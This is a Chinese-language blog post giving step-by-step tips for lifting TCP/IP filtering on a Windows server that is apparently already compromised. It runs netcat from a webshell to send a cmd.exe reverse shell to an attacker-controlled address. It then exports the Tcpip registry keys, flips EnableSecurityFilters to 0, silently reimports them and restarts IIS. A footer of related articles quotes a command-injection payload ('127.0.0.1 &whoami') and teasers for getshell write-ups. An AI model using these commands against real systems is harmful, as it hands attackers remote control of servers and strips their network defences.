解除TCP/IP限制的小技巧

原創 szbenxu 2020-06-15 12:29

作者:河馬史詩  http://www.wrsky.com

1.用NC反彈得到一個shell

本機監聽 NC -l -p 32

WEBSHELL運行:

x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port"

得到一個shell

2.CMD下導出註冊表文件
C:/>regedit -e x:/xxx/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Ser
vices/Tcpip

C:/>regedit -e x:/xxx/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip

C:/>regedit -e x:/xxx/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip

修改各文件 EnableSecurityFilters 處
將最後的1改爲0

3.將註冊表文件導入
x:/xxx>regedit -s 1.reg
x:/xxx>regedit -s 2.reg
x:/xxx>regedit -s 3.reg
-S 爲無提示

重啓命令 iisreset /reboot

完成TCP/IP篩選限制

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Kubernetes 生命週期事件處理函數 postStart 和 preStop

在 Kubernetes 中,您可以通過爲容器的生命週期事件設置處理函數來執行命令。Kubernetes 支持兩種生命週期事件處理函數:postStart 和 preStop。 postStart 處理函數:在容器創建後立即執行。這個處

原創 2024-05-31 14:05:26

雲效 Flow 配置備忘

腳本 項目根目錄下創建shell文件夾,創建 cabinet.sh 腳本: #!/bin/bash # 應用名 APP_NAME=cabinet-service-test PROG_NAME=$0 ACTION=$1 APP_START

原創 2024-05-30 11:43:23

[oeasy]python019_ 如何在github倉庫中進入目錄_找到程序代碼_找到代碼

  繼續運行 🥋   回憶上次內容 上上次 真寫了 萬行 代碼 這 萬行 代碼 都是寫在 明面 上的 這次 使用git命令 下載了 github上面的倉庫  

原創 2024-05-30 00:35:24

記錄一次cnvd事件型證書漏洞挖掘

事件起因是因爲要搞畢設了,在爲這個苦惱,突然負責畢設的老師說得到cnvd下發的證書結合你的漏洞挖掘的過程是可以當成畢設的,當時又學習了一段時間的web滲透方面的知識,於是踏上了廢寢忘食的cnvd證書漏洞挖掘的日子。 前言:聽羣友們說,一般可

原創 2024-05-28 11:16:19

記一次攻防演練中的若依(thymeleaf 模板注入)getshell

記一次攻防演練中幸運的從若依弱口令到後臺getshell的過程和分析。 0x01 漏洞發現 首先,我會先把目標的二級域名拿去使用搜索引擎來搜索收集到包含這個目標二級域名的三級域名或者四級域名的網站。 這樣子可以快速的定位到你所要測試的漏洞

原創 2024-05-27 23:16:06

智能的PHP開發工具PhpStorm v2024.1全新發布——支持PHPUnit 11.0

PhpStorm是一個輕量級且便捷的PHP IDE,其旨在提高用戶效率,可深刻理解用戶的編碼,提供智能代碼補全,快速導航以及即時錯誤檢查。可隨時幫助用戶對其編碼進行調整,運行單元測試或者提供可視化debug功能。 立即獲取PhpStorm

原創 2024-05-24 12:20:21

linux加載動態庫失敗

一般我們在Linux下執行某些外部程序的時候可能會提示找不到共享庫的錯誤, 比如: tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open sha

mskk 2024-05-21 00:52:55

Shell/Python中的用戶名獲取

一、幾個基本概念 登錄用戶(login user):通過登錄方式進入系統的用戶,強調登錄身份。 當前用戶(current user):執行一個進程或者命令時所使用的用戶身份,強調執行身份。          舉

原創 2024-05-19 00:44:35

Linux中的tty和pts

一、幾個基本概念 tty(Teletypewriter) 來源於“電傳打印機”,Linux系統中則是終端設備的統稱,同時也代指操作系統中支持終端設備的tty子系統。   console(控制檯)

原創 2024-05-18 00:45:13

Netgear無線路由器漏洞復現(CVE-2019-20760)

漏洞概述 漏洞服務: uhttpd 漏洞類型: 遠程命令執行 影響範圍: 1.0.4.26之前的NETGEAR R9000設備會受到身份驗證繞過的影響 解決建議: 更新版本 漏洞復現 操作環境: ubuntu:22.04 qemu-ve

原創 2024-05-14 23:17:30

記一些CISP-PTE題目解析

0x01 命令執行 直接payload: 127.0.0.1 &whoami,發現可以成功執行whoami命令 然後ls ../ ,發現有個key.php文件 嘗試用cat命令查看發現不行被攔截了。(其實題目過濾了常用的查看文件的命

原創 2024-05-11 23:51:24

dolphinscheduler 之變量篇

場景:查詢數據表總數,然後根據總數判斷走哪個分支節點 1.將sql結果輸出到變量 2.分支判斷 3.輸出結果   小結 本文總結了DophineSheduler上下游任務之間參數傳遞的方法,並對其中的易錯點進行了梳理,同時給出了具體

原創 2024-05-11 00:57:01

MySQL 通過 systemd 啓動時 hang 住了……

mysqld:哥,我起不來了…… 作者:賁紹華,愛可生研發中心工程師,負責項目的需求與維護工作。其他身份:柯基鏟屎官。 愛可生開源社區出品,原創內容未經授權不得隨意使用,轉載請聯繫小編並註明來源。 本文約 2100 字,預計閱讀需要 7

原創 2024-05-10 00:35:39

windows開機自啓動bat文件

步驟: 1、win+R,打開運行,輸入“shell:startup”,打開Windows啓動文件夾 2、將.bat快捷文件粘貼到Windows啓動文件夾中 3、重啓電腦後,系統自啓動.bat文件

原創 2024-05-08 21:56:26

[oeasy]python0015_鍵盤改造_將esc和capslock對調_hjkl_移動_雙手正位

  鍵盤改造 🥋   回憶上次內容 上次練習了複製粘貼 按鍵 作用 <kb

原創 2024-05-06 11:45:36